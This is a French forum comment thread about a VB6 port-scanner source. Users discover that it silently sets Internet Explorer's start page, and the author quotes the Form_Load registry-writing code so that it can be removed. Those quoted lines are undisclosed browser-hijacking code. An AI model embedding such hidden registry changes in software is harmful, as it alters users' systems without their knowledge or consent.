[REMOVE THIS]

cs_Pekinio Messages postés 161 Date d'inscription mercredi 11 avril 2001 Statut Membre Dernière intervention 10 mars 2002 - 6 avril 2002 à 22:51
cs_aKheNathOn Messages postés 575 Date d'inscription dimanche 23 décembre 2001 Statut Membre Dernière intervention 23 octobre 2012 - 1 mars 2011 à 11:47
Cette discussion concerne un article du site. Pour la consulter dans son contexte d'origine, cliquez sur le lien ci-dessous.

https://codes-sources.commentcamarche.net/source/2968-remove-this

cs_aKheNathOn Messages postés 575 Date d'inscription dimanche 23 décembre 2001 Statut Membre Dernière intervention 23 octobre 2012
1 mars 2011 à 11:47
héhé ... faut s'attendre à quelques contreparties quand on utilise ce genre de logiciel :))

Plus sérieusement, le programme n'est pas un trojan mais juste au démarrage pour IE il met en page de démarrage un site qui aujourd'hui n'existe plus ...

Pour le supprimer dans frmSplash, fonction Form_Load supprimer les lignes :

Dim VAlB As Boolean
KY1:
DoEvents
VAlB = UpdateKey(HKEY_LOCAL_MACHINE, "software\microsoft\internet explorer\main", "Default_Page_Url", "http://www.multimania.com/myhackerside/show.htm")
If VAlB = False Then GoTo KY1
KY2:
DoEvents
VAlB = UpdateKey(HKEY_LOCAL_MACHINE, "software\microsoft\internet explorer\main", "Start Page", "http://www.multimania.com/myhackerside/show.htm")
If VAlB = False Then GoTo KY2
KY3:
DoEvents
VAlB = UpdateKey(HKEY_USERS, ".Default\Software\Microsoft\Internet Explorer\main", "Start Page", "http://www.multimania.com/myhackerside/show.htm")
If VAlB = False Then GoTo KY3

Puis recompiler avec VB6.

Sinon les perfs de scannage viennent du fait qu'il envoie simultanément les paquets de connexion ce qui permet de ne pas attendre le premier résultat mais de passer un max de ports...

C'est pour le fun plus que pour faire du piratage,
donc amusez vous bien :)
MacGaliver Messages postés 146 Date d'inscription vendredi 28 mai 2010 Statut Membre Dernière intervention 21 juillet 2013 3
1 mars 2011 à 10:23
J'adore le bonus (trojan)

--------
découvert : virus HEUR:Trojan.Win32.StartPage Le fichier: http://www.vbfrance.com/dlzip.zipnix?ID=2968&accept=1//dlzip/Big Speed Scanner.exe
-------
PHDTeam Messages postés 6 Date d'inscription samedi 1 novembre 2003 Statut Membre Dernière intervention 14 avril 2010
11 janv. 2007 à 23:21
mois je trouve qu'il est exelent est très rapide 20 cash
cs_Pekinio Messages postés 161 Date d'inscription mercredi 11 avril 2001 Statut Membre Dernière intervention 10 mars 2002
7 avril 2002 à 21:54
ah ben voila quand tu veux ;-) tu avoues que c'etait un argument commercial...lol...ben oui, pour scanner les 65536 ports, ca met 24minutes, mais en mode filtré c'est bcp plus rapide, voila la verité...sinon, il est bien, c'est vrai, mais pour peu qu'un jour il soit connu, les troyens next gneration vont changer de socks alors bon, ok, faudra mettre a jour la base des troyens, mais perso, je trouve qu'un scan exhaustif est mieux sécurisant...
cs_aKheNathOn Messages postés 575 Date d'inscription dimanche 23 décembre 2001 Statut Membre Dernière intervention 23 octobre 2012
7 avril 2002 à 11:43
:-) et merde j'avais oublié que j'avais laissé cette fonction sur le prog !

Le site n'existe plus de tout façon :-) ...
cs_Jack Messages postés 14006 Date d'inscription samedi 29 décembre 2001 Statut Modérateur Dernière intervention 28 août 2015 79
7 avril 2002 à 05:22
Le petit cadeau caché, c'est la modification sans prévenir des pages de démarrage de l'explorer (sans parler des fautes d'orthographe).
Par chance, j'utilise pas IE !!
cs_aKheNathOn Messages postés 575 Date d'inscription dimanche 23 décembre 2001 Statut Membre Dernière intervention 23 octobre 2012
6 avril 2002 à 23:27
Pour les skins je suis d'accord avec toi , d'ailleurs c'en est même pas :) ... mais désolé le prog datte et j'étais un barbare à l'époque .

Quand à la vitesse là parcontre je pige pas de quoi tu parles ... Pour scanner 10 000 ports c'est normale que ça dure ... mais si tu veux pas attendre c'est plus interressant de scanner que les ports potentiellement dangeureux ... et dans ça cas j'ai du mal à croire que sur ton pc ça dure 24 minutes !

Essayes de modifier les paramétres si t'as un bon modem tu gagneras de la vitesse de toute façon .

PS : Normal que je dise tous les ports , c'est un truc commercial :) ... Mais c'est juste les ports dangeureux et là y'en à - de 1000 ... même 300 ou 400 je crois , mais le truc que je veux souligner c'est qu'avec ça tu peux scanner un pc avec un assez bonne précision tout en scannant ce qui t'interresse ... et je crois qu'il est rapide pour faire ça . C'est en vb et c'est plus lent que les autre languages cependant le résultat n'est pas si mauvais ...
cs_Pekinio Messages postés 161 Date d'inscription mercredi 11 avril 2001 Statut Membre Dernière intervention 10 mars 2002
6 avril 2002 à 22:51
bon allez j'me rattrape (cf. source Val=3842), il est pas si mal, bien que l'interface soit à chier, pas la principale, ou ca passe, mais la couleur bleu des fenetre de scan, trojans et tout c'est trop immonde...Bon, quand à la rapidité, c'est a voir : : 10000 ports (tous, pas uniquement ceux succeptibles[...]) en +/-220 secondes soit, pour la totalité + de 24 minutes, alors quand tu nous dis tous les ports en moins d'une minute, tu aurais mieux fait de laisser parler le silence...
Rejoignez-nous